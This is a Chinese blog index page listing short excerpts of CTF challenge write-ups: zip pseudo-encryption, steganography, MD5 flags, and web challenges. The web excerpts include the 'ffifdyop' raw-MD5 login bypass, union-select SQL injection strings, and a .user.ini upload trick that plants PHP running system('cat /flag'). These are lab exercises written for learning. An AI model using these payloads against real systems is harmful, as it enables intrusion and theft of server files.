上一页 1 ··· 4 5 6 7 8 9 10 11 12 13 下一页
摘要: 搜索http数据包 发现一个post提交的数据,右键追踪流 根据题目提示 账号和密码串在一起再md5哈希 拼接用户名密码得到adminaadminb 使用md5处理后得到1d240aafe21a86afc11f38a45b541a49 flag{1d240aafe21a86afc11f38a45b5 阅读全文
posted @ 2020-10-18 15:36 夜布多 阅读(664) 评论(0) 推荐(1) 编辑
摘要: 首先解压后打开,foremostlrb出来了一个zip,明显伪加密 老规矩,09变00 解压后出来个flag.vmdk.拖到kali里解压 解压出了四个文件 一开始我的这四个文件都是没有权限打开的,因为我也不会,稀里糊涂搞了两个多小时无果,然后问了大佬 chmod -R 777 文件名 这个是改文件 阅读全文
posted @ 2020-10-18 15:26 夜布多 阅读(1721) 评论(0) 推荐(1) 编辑
摘要: 打开之后,直接formostlrb 我们打开压缩包看到asd文件下还有图片和qwe压缩包、 伪加密,01变00 出来解压 我们打开kali,然后将这张图片拖到kali中,使用steghide工具 得到压缩包密码 解压同文件下的压缩包 复制一下,就是qwe.zip的密码,打开我们获得flag. fla 阅读全文
posted @ 2020-10-16 22:48 夜布多 阅读(627) 评论(0) 推荐(1) 编辑
摘要: 首先打开之后是一个py文件,本地跑一下,出错 显示说, 源码为: import hashlib for i in range(32,127): for j in range(32,127): for k in range(32,127): m=hashlib.md5() m.update('TASC 阅读全文
posted @ 2020-10-16 19:25 夜布多 阅读(1356) 评论(0) 推荐(1) 编辑
摘要: 进入之后 然后我们看到了一个if if(isset($text)&&(file_get_contents($text,'r') "welcome to the zjctf")) 要求text不为空,并且file_get_contents($text,'r') "welcome to the zjct 阅读全文
posted @ 2020-10-16 11:39 夜布多 阅读(354) 评论(0) 推荐(1) 编辑
摘要: 响应头里发现sql语句 select * from 'admin' where password=md5($pass,true) 看了大佬博客,这个可以用ffifdyop绕过,绕过原理是:ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9e 阅读全文
posted @ 2020-10-15 21:58 夜布多 阅读(298) 评论(0) 推荐(1) 编辑
摘要: 看search.php 发现了一串base,先base32 再base64 然后我们还是像之前一样,确定一下列数: name=1' union select 1,2,3,4 %23 &pw=123 这样的话就报错了,然后再把4删掉,成功显示,这便确定了是3列 name=1' union select 阅读全文
posted @ 2020-10-15 17:10 夜布多 阅读(259) 评论(0) 推荐(0) 编辑
摘要: 将其等宽高 阅读全文
posted @ 2020-10-15 14:43 夜布多 阅读(279) 评论(0) 推荐(0) 编辑
摘要: 打开之后猜测是伪加密 09 变 00解压 发现是png的图片,没有文件头,添加89 50 4E 47 保存改后缀,查看 16进制转换得flag BJD{y1ngzuishuai} 阅读全文
posted @ 2020-10-15 14:36 夜布多 阅读(468) 评论(0) 推荐(0) 编辑
摘要: 首先添加上传一个.user.ini GIF89a auto_prepend_file=a.jpg 再添加上传一个a.jpg GIF89a <script language='php'>system('cat /flag')</script> 在这里可以看到 uploads/33c6f8457bd77 阅读全文
posted @ 2020-10-15 11:27 夜布多 阅读(138) 评论(0) 推荐(0) 编辑
上一页 1 ··· 4 5 6 7 8 9 10 11 12 13 下一页